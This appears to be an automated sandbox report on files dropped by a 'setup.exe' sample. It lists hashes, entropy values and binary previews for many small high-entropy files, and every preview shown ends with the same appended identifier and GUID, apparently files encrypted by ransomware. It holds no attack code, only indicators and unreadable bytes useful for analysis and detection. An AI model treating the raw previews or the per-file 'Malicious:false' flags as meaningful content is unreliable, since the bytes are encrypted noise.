              SHA-512:6115115E37566329903017D6FE5262DEFF70279B0897B67AFCF0D7529CDC26BCB4B2CC00355FA665FBBCCAB64FC8B9B86046BE9984DD823AE5870C1BC57AF5EC
              Malicious:false
              Preview:<?xml...q....dni.yS..f... f..N&.&...H..].&"S...Q.]....p...2...U.n.e'......Z3..+2.X.....\\Il<..j..a+c..B...<LV.J.....*.....&W.}\..E...6*....m..P.a.'Z..O)|2,.s.e.?%H9xAn...Yh.(..Eb.........ov.?K..s..\).K.J%M.K..X..i.....5s.;.<..........#...`K.{a ..@.k..n..E...H...P....3.H;=mI._..B..0G..H......@....#*.}.~J.!R........w.........>|..4.!'..jb.:..|.Sp....a.c`.....KM)P.Y"......V.Y%;....Z."S....A..9d.o.e/.fmo.#.........g..ID.s.Y..,...v...a._....i.....>.{.f.\.w..OM...#.... d.w....!.vu.X..7..)..*{..Xp@.....c......k...@..Z.m.}.....,.\....|.N. v.)..nx..Q.XZJk......Jp....G..d...s.U..y.7r$.1^........Bv&.w../L.......s.,..........{.%^.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):802
              Entropy (8bit):7.7610172913418705
              Encrypted:false
              SSDEEP:12:/d5JCNzaDoD+NlZvTyGzL7utjAhtxPR0WAUiMDun1HAsfMy1XIY0cxRGsMR2ciik:/DxNlZrL/70ADj0HSuehy1XIY0wR3bD
              MD5:7AE154963613AE4FAFBEE0921F096A05
              SHA1:196A1587B97A806E010094B7674EAF70DF1E397D
              SHA-256:ADB9859D9249C8A5AD7D0232B00BC5E83025DF7AA322F8CD65E0F44EC7E0FF7B
              SHA-512:6988FEA552E28C8D8F2E6F160EABAB9E0514CF486DCAD0C6E1928228AA736A7EEAB76BCABEA7301A9F08A44D7F555E87121FA1B0393BFD569D9F86C7FD733CA5
              Malicious:false
              Preview:<?xml.J.h_.8.`.n..{a2..A.;r.[=.......z...q.=..(...U..U.o ln*-.#..g....j.n .&.8x.....=Y.....; a> .*.C?......%..8.*....F.y*.M..UPg.....,..].........p...z.....2|C.:..7..^u|........Y...X;6./....T.@5...T.hSk.....y.AV.K..Yr.W..b.#.....b...Y..!..0J.EA..u...bM.....WX..L.. .......u.[.7..Wk....d..c.eKQ<.....$.....6..U...;.B.%...l:O_F.2....>.$.r/...J.Rt.B...l........\6....B.].g....H/..K.l.(....e...0a..]r3).5[..\.Vy..[.Z.i.......#...nM..r....v..... ...e[..l.v,X..J...{....Z..S........<...<..K.A.....<..?*'}I%.......|.CGl..n.`B...U....i...]......^w.h*...u.I.....(..cv<.l.syx.....d...A.{!.m.../9Xc`.. ...mr..."...~k.8=.\.m.......e.U...G5...I-...6.9e..z8.31R...........).m.....M.90fd...L./...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.721617658375104
              Encrypted:false
              SSDEEP:12:UjeOzD8NxKKksYvVC0LKuCc1qdN5k1nK41G4DF8hiSfjRbXPwqcPmzsMR2cii9a:UjbUN/qVCArqdutFUpXPWbD
              MD5:0E6B17A89101D44B3ED1DBCF46E5845C
              SHA1:B1D7F511D4BB834465204A87D6A960E30D7FAA0A
              SHA-256:3A97D100DA8812DC24F9198541CB1F4D9F4742BF01E891FEF09D2124E38ED6F3
              SHA-512:30444C59FC3ACB92689ED4C6E15EBAA4A5935D3DE16DC74BB5B7E3A62EEFA1B7CBA60AAEB8F3818FA2614EEA09D7DE9E7C95460ED88C5E1EE42CBF70B3A57B87
              Malicious:false
              Preview:<?xmlN..9.Y..;Bfo...y.....4J.2.Y.47r...Q!/~g...@T....iO/...N.%...T.....j.4.ph.: ........H/..S.,..R.......K\.i.X.a5...c.:N.mr..P.At...[.`...c..|..G..&..%9.......W../....N...g'y...is..".......5..6..E.(..........\..Z9.9.0sv!.7...y...CQ. f....0.a.<0x...Thebl...8.2Cu...?<.P;.....0......s...F.xVr.~.*..dK.^ 4o...I..a..-JwI.d.0|c......c.......J.(Xv..]...A.......L..............)..o.r"V>.|.t.m..f...R../.].....tsi.....^{c.s...^...M .u...'70T....."...,...#.'..x\Z......q..U.m?....(...-.@Q.T.x<8....am.39...u.S.}.....g.....$..eFx]3M!..\Q..SS.!^.w.......Rlb.NO>..'..W...)&/{e.u...4...kEn..R.k...4........tOWa.......Z.1.9F.6.j.......C7.......Ci.5..O.M7....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):810
              Entropy (8bit):7.732272179583677
              Encrypted:false
              SSDEEP:12:GISh3WJucomyMkeRZs/Hq5v8TYENVYnOVykrhdfDFhLGec2BlXHhwucrPwsMR2cq:qhGz8scHCCpEyPhit2rhubD
              MD5:0C25F3B83CC17AF7A878D169FF676CB4
              SHA1:F753BD12DA3264153198B1DE1ED5494667BC3907
              SHA-256:F5FAC612E50F4B7D187D5D6EBCEC0A682566AD7D95B2489990E655515827AD8E
              SHA-512:E6B46606EB89CB19C7828020ED8714D8228FD7D91E3BECD12BF8DB1681B65B9B14CE399F727AE082CEAEA63FE43F87C5D671D49944E27C11D6B5B66741B4BEE2
              Malicious:false
              Preview:<?xml....}..<$Qt..e.:p..TtY.k..G.N...8V[....wE..#B...r.>9r...!.r?.c@....+uaf..|w..=.$.O.z.dn.^...^4 A.oHS.3..N.cS..%.........tA..].v.Tw...Q..?..$....D{....)...X}....h..$h..../...\2^4.@v..Ap57e$4.......V7s.......M...?....pl....s..$'...-..?b.y.59..m..!..rM.[4........g.J<..K....)........HhD[.7.fh....G.Us9)....H.,. "....Y......>.~<.>..b.z....E......X...P.nk.x..4......C.}g...G>.-...P&..^a.].\.,s...R....R/.F+...h...r...r.{...|Vk....Tm.(r.Aah.@o...:|.@..,(.}.......y.0.$.`.i..Ccg.e. ])6z...n.V7...f...J..l.HZn.......q1.`...D....tZ..D.....{#...^t..\.H.....t.4..$...gD&.V.0~.P.............+.>.,F.a..O...vN.=...Y...e....<....sX.Ll.Z.3.3/...N..sx.k.j..Eit7$g....0..&'.e..9+...n.....2}.#18["g...t.^f./..D.....GD.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):797
              Entropy (8bit):7.729695200177786
              Encrypted:false
              SSDEEP:24:2eRAI0+mGqkVk58WVogObwB3Osc2dOHUcG0bD:IJ+rvO51VKI3tcG9c3D
              MD5:08D4786BDB1F53635E16D7CF006EFEC6
              SHA1:746145D8AC537F6C4741B5523CC81D91A8B7696D
              SHA-256:E41127290FB8E495126B6DD5CEEED9E8FA2BB417A31FF2D4AD1FFCEFBD9D69AE
              SHA-512:6D774D27B3EB4943E80578598483B38DCFEE5793C6A2E218126F3323C6BE05E2FF1A9FE57475328B9AD72C77B8C52E391D3C47829632BD9159F25553E25EC77D
              Malicious:false
              Preview:<?xml..7Eu.6.Oi........y......eQ.N^...$.n.F3.`;.QQkt..wf....z2".F...>8l]....i.$.nGI.c.....j&........A.."*.z[o..H3_.^....?.z...g?...H?.........V......U't...U.......Z....=t...(...>.....O....p..H.._T...B9.P.....x}.....`.=,>.v.k..\[M..V5.vY..y.j.r....9E..m#....QCy.....t...K).7)..N..qS..0.......Jj\C."4c..|.(..Z.f..{9.(....0R..7.ZJ..C.84..vB......".[...p.ZUM..."a..I..2........&i#O/'o.N..!3.*.sg.I...m....:..m.A..`.Bn.+?..@F...v...._tZ..0..J<KAA..l......C..T..4*d+.V....uK..H...M..y..qq.m..0*>~..iy.....*.g..:.....6...:j8.s.).....T'R;.&..Q_.....G.{AI....b*.9.hS...F..Y.J.8.<.c.e.M.".B..s..^.Ae.oC.>...,.`.?~3...:.Vq...'..r.d.M......Ji....I....-n[}.6RM.R....:4_...T.......o.....1....Q...XJU..?VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):827
              Entropy (8bit):7.757182994188974
              Encrypted:false
              SSDEEP:12:PNcwj6P5CbRMtUrqAzkKhcRpuJmso+Rg9xJqebeSab7ifk6rrdxapxNPLpvntfyh:WfE+ig/iJkR9xxeIzrrdxabNlvn34DbD
              MD5:71A61426E8DBDBE4951448D187EA3DD0
              SHA1:B33AA08D9258621BC3C68769874A0BCFFA83B129
              SHA-256:3915134DC619C800F22BE036A6644943A47F630CF19C93AE193FE4960DF514D4
              SHA-512:8A633BBEE6AA1156DA34FC0554A1E729923839080680C8931AB192D00E24E13154D5DA51584BDADAFDE0BD63C887B1A22584A3413F85A3929083DE59665C2E4F
              Malicious:false
              Preview:<?xml.d..lM.;.f..O.......ihk.....d.M..>E..&[\%...M.......m=T?.....d+.3B..f..o...S.@.7.Ai.^8...R.^f.r5...o.Yju..........1m..?C?f.h.~..J.+..R.*&H.....>.0g.......h>.be`..).@v.....xx..+zY.`.=o..\..:..c|yh.8...cg.>b..e...^.y.L....rV9h(...pd.%.f..IJ...!@Y^..Z.)..r........ .J.....<.s..l..4."?...........(0 ..(t....c.a.XN......+.]...[...!.[..l....D..Bv.w..D.a.?..4r..3...S..d....$..0..S...;.:Q.G.5.c.Ww%..{.Q..;..A..)B.-.S.ttav..9.@.Oq..rb...x....(..(2.].0...'..0.YG...!...L.Jlq..Xf....F..S......j..../....3...nH..9....ka..!..:...L7...$..Bi.I~.......ti...`.b@...e....u.l..z..?...6...>.MkF{K.c.CC..1Y..2 [..,.1.m....%.=...n..5+..7...@......^......q..j(.;.s..yf'.ZE).(p.a@.I#.d..r....2.7'....;oB....H.....p.....~QMLJ.VxQ...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.697960230652691
              Encrypted:false
              SSDEEP:12:4MBPoqYUFgq41xnYj+udTKDbb9Dod4QwyAKptUodS4rCkFspFfsGU8ZzNGiMrsMS:4MBPotLgeDb4wZ8tNdS42kYfsuNGihbD
              MD5:C662B5C33C5413E123F71CD78522B959
              SHA1:6A66A8A1CD31EE1836CE0880A679C7963BB87C51
              SHA-256:DB28B341A457ADEA736A31BA9BCC123EB44D315BB9F52EF07240CDD29077EFB1
              SHA-512:AF2598F33A9FF63B7EB5C77E837AA1D1DC826A6B52521108901D918A1CFE48711B45494A5F252E777A62D344921C89E63642B92FBDCD7371271B74779A77A803
              Malicious:false
              Preview:<?xmlE.9E.@(.... ;..`8.....^.7..8V....A....2,F..e<M.1.BZ..2.."......*..gG...... ..5~9.M...,.MR..aW.O3.....l.i..{QLl....U.w..<N(....T..X.l...j.6...28.|.....bm%/LX.. vh#.. 0.....r2....qTb..6tH.}.lt.....^......h7.....E..j.L....0]m...7...V..18'...fU..u.=..n...S.6.u.r.bm7+y8.L..@..D..oX?..6...x........!..$.}]|<..Y..T.t....."..\...N... ..N2..1...'W..e<.m..P.....*..Ik.../.E..i.z#/}.W.%....Dp..L....ZZ...Oo......a:lxC.H....*w...0.n(.NV..u.......m$w..>...k..,..e..:%G,.g.5.]).F\_...Q.g#.nR.....\.Z.].n.R.q.V..,..0+.z..R.y..5....f.H..=_q.oo.@.j....*.>.H{:...L...[..S.S..6...8.b.f....|I...j....>...+f..`ZU\.{\6.,...)...1..K.%..=.Z\@.KF.<...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.715349162799234
              Encrypted:false
              SSDEEP:24:YrvQ96SG4UPzY3oe5YO3XLCMzK3T1i6BpKyouPpbD:265GtY3omLuMzKRiqKnkJD
              MD5:89740995B63E1A272D210B4BB54D0C04
              SHA1:FFB4A33E392911B0BF675D30080285DE61CE95F8
              SHA-256:252F19C2892CDBA9B967717F17BE79E56662397B8E36F540B9B744D1DCDCBE7D
              SHA-512:8229158CA728641D253185035982CB832F1C0776FB201C25257AF994DCB2E1D921767202D637FE8BA7CAF9F65B3C815C86E82FD3A96753B140C867875B7B5667
              Malicious:false
              Preview:<?xml%;.........i.7Z.#...P0.J.|V.Q..G.e.CW...@)..X_.....p......g\...d..)....z-.7..*..A...}z{./...R.F3Q"7...m.k..d.L..mZ...b=A8.....vw.I...J...P/..........cZ.e}br..dq...Q(.GV8.c..Mw.....Q.!.8g7..X..).(.,.o0...\..r..T.I..U..kL.p|.......CR....:.".....g.:}.}@P}5.... .".^.}..U=......m`.xb.....R.{...d.3.ByG...j...d....c.9k<r.....!@S......./H....:.A...#..u.X`4?....\l..f.u.G(#.U..d.`m.G.........|r.....?L..Y.`K..9..7..|./....v..z..A.7.Z...0.7.d.d.i.......{.=4r.rL...&.s=..#Rn...W.;.E.I..U..1.#=.....s'..(6..t[C..&..2M.:.#.'.G....l.^./~>a.S.z.pq....7X643...R:.d......w._N.cp;k....'.....B.L...d..u.PB.....X<D.(y2..j..}p.....Q&%..VR.__.O.z..H. ...~.q.@.dh%......`C:.t.....>...N*.P.w.........d3AVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):737
              Entropy (8bit):7.673944552388927
              Encrypted:false
              SSDEEP:12:wU/YD5aiirHieQpRreckfEJ4NroCytliOb9YRFyQCBfb5sqfdI4+oVER/XKLfwsQ:wwYVDIHumLrong/Da5sC2oVEyIBbD
              MD5:EF592A5792FA3175C837403908246F61
              SHA1:960EEA6533FA125FB1C7655C06701C415E0F1E69
              SHA-256:6061F1A76A32F75A39F4A9B615440F6206AE25B83FF01987F7BE5A0EE8448FC8
              SHA-512:FC223C1017FA3A8484E92C0E0164D475CB61E9DF084B59DFADA53B9AC0EC7C0858B969030EC2D616364B41B0433B716F8E0F840D604EF68401097D51A90B1825
              Malicious:false
              Preview:<?xmlM%......3..m./.]b.B... A..y...E.C...F.P...q......e.rC8{...C]..=pM!NX.p..B...y.9..Xk..Z.k'?...[.......t!..bg.#......sv..3..../...+.t.\@...U..S.f...._..m....WU.M~L...lMC.@.......R...&....80..L......]H.f....\..A.....uS:..=i....#.{_N.l@......`.W..;`.F.n%F....v....&L.......9..Q!..UxQs>,;..x...........n2Pu9+..v.j... .......)-...+....v...H...K. .!....C.'.../.+.E.|..9.R.Un...6.R.S.....f...N.?J.P....["v.......,.?.BmY....%fJ.[.E.<.....>.i.};.C.v.....@.../B..ugb..CA~.q.[vVQ...L/V...>*W........YCE...~."rc.Se.?....d...c..a6........_....]).,4..v.6...}e......(..4YIf.j,..)9.N.O..>.9F...W...7.......;..o...c/.)7..g..|...H).e.%.zO...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.724869218889118
              Encrypted:false
              SSDEEP:12:GppLfm/ahUE599aEt5BnaZDwGGMhRITdWMCWo5Axc+/Y6g2+M5sMR2cii9a:Xah7599au5NaFwURIKW5xZQ6g5bD
              MD5:A301FE5137121B361FA012ACA468AF29
              SHA1:93BA83E3CA53CF53465E7169F25034B49C10CD59
              SHA-256:238C2F259D55A5A8626F7B5EE7998927E42F486B162CB826DA33C2A60DB50329
              SHA-512:E41ADC85F078CA5320F9A511298D788535955B3A4FC8143013E50A4628BECA244C3C022732D4727F740A229334032FB447A0565B75046D20B5F8EC4E5FFC9208
              Malicious:false
              Preview:<?xml.#...G.Qg....sA...N)d[>.......1^3$..aM..v.v..t[......P....P..h.U..8~...s.q....?.....Y %..a..Y.....i...l...y<.l....@:...1.e..."...^...lE.t.*..;.C..?.?A..O.Z.<7.j.....4.../....3n..p.n...u..{Xp....@c....<..?c........`.v.1e..x,....s9>.r.N...1.0..#N.6....C>......u...J..;.....-.1....i'....+qZ...*s..0....oX...q....j}...o....\.Y.....!..b4w....."B.cv0|i.<../ -./.......Yw..i...y.s.F.*....h....."^.[.k.C.C..+..O..J9....Y].#.+..&..T.%..!t....VZcU..C.Jl..^P..cva.c....sT=3|.S.._.....?.j(.."I1%de..|S....B...LN.j....%..zQQ..N...fvE;G..i..|.}*...zVv.N...j.....#...3.nL.}......H....]<.../..?........cl.>..[.^&W.2.h..y.p.n...brT.O.........B.ez.C.iN..n....J.a."M..e.YX^..S..'#.K0?.'Ci.......K....M.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):761
              Entropy (8bit):7.731894167395408
              Encrypted:false
              SSDEEP:12:o8c2qU6xIlc3g05vTuAIYIHVS1gJ8yZjNNu8bVItC/N7uw9l7tTrQlpPZQd9ea14:on/IlcwC7IlHVS1oZ++uw9b3YBM1+bD
              MD5:17E29FCDC9202478A91ACB749F83E293
              SHA1:B595D372AD1AC277D1EA647D77BDC3071BB8E8DB
              SHA-256:69FCB2298FBE3339EC971A4DDA769636DE8F68622C4A2E407AE2A782059924B5
              SHA-512:1FEDA34CF9B027940B8E53A2267FEE01724E0DB375AA705194ED892FEEEB2D29A7CF04BCDC148121C09538963936F757D1F9039CD38A0960B6F0B70EF78CD435
              Malicious:false
              Preview:<?xml....T.~....7... ..CwR.{..x....s._.7. Q..FmV.|....4.s-.]...5..|.."-..c..8`.._).Z....khA k.[.}7...s.....i.I"P...|s.....{a...u6..5......u.H....*..-..d/Y....c....s.;D...F...!.B...89rI..7.W)D...Eat.W.}.....S.5.a.......iI...Bp..@.!.W..O..LKXg.......S>...M...#rt....K@C..N.@aT35u.$V.+..H.0.,Mesol.h..F..^M$.VU:.^=8..a.I../k.X..\....s.rp....z...l.../.t..VX[..L..?Mh..0lO.[.O......n.UG.Y.......^....U....E.C.P.s'.....\.i?.~.....y..M...%.d...&.8............%Q.+.......~...'.e..6...j+{....e.qO*.u.ZG...[y..#%..;.....r....]&^....Y.s/.M..$.k..0..........?t....b.3.{...X..k.ns?W2a.1....DSD.................p,.c...9^...F.c..P&...R.P.. ....m...7.:.;.K....,...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):832
              Entropy (8bit):7.750935292868982
              Encrypted:false
              SSDEEP:24:UqBDO94hrkHTR7pcF0+j9ePQoAcJ4sa8zwYbD:U6rEDkj9eItcJNXzwCD
              MD5:A3BE2066FC1221EDAFC01AC6044DEECC
              SHA1:9A5AE39EFF716F5B083263D05A10A4951D298C60
              SHA-256:77D23F54F0FC4A9C23D989894B74AEBA58CDC7B5C319217DFFA5FD03CA3D283A
              SHA-512:873725CF1EC50C781FE48F9D857B90BFA931F1E916E7494F60471C068F7E708AD5C829AED91847E076103C680FAE5137950198BBBDBA268D291CD1DB04C394B0
              Malicious:false
              Preview:<?xml&_jz........PT.-...q....a..eKZ.W..+...Z.sN.5...,.=s....Ht.=.M#..{....H.n.x....(....gm.o.".d..b7..Ms.q..bNM...U.)..T.R'.~.H.[....~,A.?....v^......jm......z.@....$....5x..C...3....N.). |.>S|.P.3..E.;n....l.7....|N.Q..aiRX..O.......1.9.....f...I.]..A[...F!.-.......n.s...v....).....(..:.-.....bwF..L.?W.r.x.N]n.....@...g......M...Q.=.Z......C.Wy/w_...c+<...'.Rf.r.....tp[n.lD..........t....x.!,CT.&+m.F...=.o.l..t.B....]..K.KF.-.Z..>q....Rj.../..+.zo,.....k..J....1.....C...,....!...>A?..,.=..`..s..CU..Mq..h..(.....$.'"_..I.~....)n..h...c.I.._..(s....y~..=.]'S).Y..\.....s..X7+.eX.t\5o.F...C.o^E.t......G.:.Uw......./...giz..O........f...7.(...X.W..8..y...M.$.B2.......)IQ..@..HH...i...'ll)....W.Q..!.....2.n ./.p6r]..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.695720854208116
              Encrypted:false
              SSDEEP:12:UVUUclqoaISWycEBBYIQqz6Teh62Ei0PnwNsEwUIVvDtQrl2y7GjsMR2cii9a:OVgqoPSWy1Bqtq981YNqxUl2yRbD
              MD5:B897CBE60B8E19D3043536D57BF40487
              SHA1:237DBC24573637868E7C560B8E57814E309E6AA7
              SHA-256:82780C5D52B6EB2D9FBBAD3CBF2C7EF2FF29D868AB239233204CA2705FCD3A46
              SHA-512:2C078185C3B60D67DAD00A2E73FEA60EAFFAF2A2F6C78A2F049655F42717329027C22E5357369ACE0E73FAC197BCF82887618A4B4FE9F7B711DB018CA6385C5B
              Malicious:false
              Preview:<?xml)......rc....>o.|...S..Go....'..<..E.$.6......[....4y...E.....Oy|{..~?Eo.z.F@...T.DF.B>q%.V.c.>..*.(D..lSF.8.d.....M{.>..gs..ft..F..r.U1.CY.6..r1.q.?).y>.:..8.,..o....$...,...P..)....-;f.8.y.O..5.f.XT......b.^f39....4G@..k...x......&..@'q....y..!.q%..a.,..q.i.5..!........9...]a.........}]..,7O..l.+.....S#........p...KJ..P.T.^.n......jl.s....R...va".\1T..9..%s...yL.O.C.*...4B...m..|+....^..jH1.Q...D~z5~.>c!.V.J_...|.....K..;..t10.G_...Fc.X.P.=..._CB.>....<...=..W=...L.\T..Q.*MYk.~....c.o...w.p....$#.E..e.PO.i.X.e5.......W.2..Z..b&....H.+Gw^.......M.o.bmO2v@u..h6M.<r.ZYAMS.....g..?...7ST..r....K...Z.\......}...b.L....;.y...(..i.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):804
              Entropy (8bit):7.764839854010363
              Encrypted:false
              SSDEEP:24:UTN5DqvB9nHlNa05mrKWygOL0g0jYV7MfbD:UTTDq59Hra05mXygO30ja7MDD
              MD5:6909A68EEF604F5A77EE54AD614151FB
              SHA1:EE9C76BF9E858D16BC32FECFB3FC7F3AB4CC2C8C
              SHA-256:F5CBD43CEFA648F8AA0AE35D82062EBAE3D5F072B0BC2EF9A4AA947AD663BBEB
              SHA-512:23172686EB27504CFF2684B0D1BAACEAFAC2DB7CEAEA6F255CFFDBFA4F9CC1E53574B2FB9185BD9DBA68E21238ADFE9DA358BF5CAB911BB12F0621A5B974CD29
              Malicious:false
              Preview:<?xml...ub...6..Z..i. ..s....j..a..(..};...C...D.%A.s,.$..t..{r+.~..1.2..GH.yo.....Xm..V..J.w.......F.*.2L..-...?..[G}.k..L.@.92.?........FoR+.%.C....I..&....7.....t.].%./..D?'...4.,TN.o.....`".}S.|.S....[i..1.b#.....Z.E...|.|...KZ.7.....Z.0Q8d...L.....y.Pe.e...cQ..+p.P.c;.?8..9z...}....ARQ..#.p..T.L...=...../.5r.."\;{.8.?....'}..{.......]y..4:..=..........S..F@..W\Y....H1.M....'.......H...........5.I.I.T`.i...n.D....>.."".L.D.M..tN..JK..}(.].3c.]...-....W_@..m.......Y(.Bk12..j.l....n...`!O_[...*.'.{...r.<J.a....&.P.:l......@..Y2.."....R....#.f4...\.?.~..z.=.....Dlh....Z..L..../..-.S..*eh'w.....S.,..U.OP..b`...m....a...M....%Vi .......Ji}.t..{=.....P.f<.....O....}.u..SM.....`.[h..lJ...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.728415407232714
              Encrypted:false
              SSDEEP:12:+fi0v/pYmisnlo4bFEzjnL1dLT6TXYfek2w2V28ioudyHAIi6mSwsMR2cii9a:U/pYmiAoCF6LrLGMJ2we28iohBo4bD
              MD5:AC54D2E4E81440BCAA1DB622BD9E36D3
              SHA1:E1B60F54ABF4AD9DA4B84754664C9488DFC67209
              SHA-256:F5EAFCD2F3582E38FD5D70F793FEDE901A15B24DD1646AE857DBB46C249DF9B5
              SHA-512:9203E2B4A6E9DD61235BEBF6B02FB520571C18A57FF4349F862190DF93E0C3060F71654244CD09E272C7637846B678B2D6F8A00690AFA04634ED2CF6DEB6AE2C
              Malicious:false
              Preview:<?xml$;..d.nF..S$z.J.[ ...JXk,X&VU..QR........4....-.@.?b....4..._..PW....J...Y.PW...............\....w.C.W`.*...k.....P.aff*.{.+..Ct...l..9pC`.zF$.(!lFT.c....N.y...<.&.fJg..DH...sq.a...ax.Ye..-..>...Nlj".L..{:.x.5..&.i.G...#C..v.B-T.W9!Y.{...........G-$:./.6.NA...>....mW...J..F.....9%..@..YX/....~...O"..x..:......;1...vk.L5..[...........*7.Gb..j.@.7...j...Rz..1..j...h.k........g=>OP%....m..24-.[..^r.Q,.0..l.....\......&.A...V.r..(w.X.L.2:.i ..F.{i....CIc.....K..z~R..g...#...2......i.U.%y...&......H$NZ..J..D.j.xk:j.1.../..C..(....i.......m.}.Q.9...u.)......h..8.5..!....F...5...A.q#R..@...!7....bgh>..L'....u..}.=F`.JH.n.=.l..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):827
              Entropy (8bit):7.721610741303222
              Encrypted:false
              SSDEEP:24:rKp0PxN19wWJXqQmumipOnkW/oBvFJ7bD:rKp2xNH80m7kjvFJD
              MD5:60929935D6A2D8D9B4A82C0B99C7480D
              SHA1:DD0F1291BD75447C74BC1D096A67934CA1AFF32E
              SHA-256:07B4A5DEEA40717251D2872F18AF8DED468EAFDD1F49438B1F2B5A9CC242060E
              SHA-512:8D43518F14C26E7113ADB72DC77DB1E82D0DBCBFAF00597267C2F9E275437E8007119E2337DB98C62B2D5E9DFD9F4DDE9512F7E5B393F2381FB3109F0D9E3D4E
              Malicious:false
              Preview:<?xmlR.k...V.t../......kk.)...>..,.H...Q>u.^?..:.u.[..../T...)..R..KBT.k.4.SCK..P|.....p.....Sf.R..Cr.J...Wjc.....w.y{b.H.....7...]r.v.'.u.g.A....._I.....^......#k.L?.....L#.........u......E2F..>.,n.G.S^.?;......x..;.T_e..>.r.F..a5N......6OcD.T"5Jl..[.....:`o.....?..`q.pWA....j.o.K..L....VSnJB.S.g.;e.(o...kY.W...JhR..d...V8.h."./.. T.H.....E.u. 2$..YR...L.1..P.]..K0....a...C.......b.;K.....?..t4....^61.Mr.....o*..j2..s.r.C<..O....Qp ..q..!..'.....'..)@>...J...[b{.-......Vk\..a........&.?.)O.G..`.c..JKWK:.=W.Xy..".n..._z.x..L......G ....w......c./2<\.x..7gt.&?.f.A.x...o@\.....q.ca....}....8........O..#...g .;i....{e...Q...g..<...tU..od......H6e...~;.....brV..w......-&.S..s...2.|..uvl6.*....%T.G.j.n.Y..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):753
              Entropy (8bit):7.660851743125177
              Encrypted:false
              SSDEEP:12:uP1EfIETRBPZvpbaMLxpLLIdLoQ4JPTMG4rWvBc6DGU8F7SpzQsMR2cii9a:Au9ZaMVRLIlb4WJqc6aAlbD
              MD5:49804A82EC4D2C8F783A906E15B315BB
              SHA1:7563BB375D4A6B2F5EBC5E98864318D2BB386D73
              SHA-256:696284D1A2025C0358CB3DFBB4C2784BFB5A88537FACB289503EE909A235DD0F
              SHA-512:05616AFAF4849AEF18C42B36DA87BBF3DDF7F2F713FE746CCCD400D6DEF2D78F6BE7D167704A894E7415A139FE46C1D562A0E888544CA7EE0F9E4C18515359D7
              Malicious:false
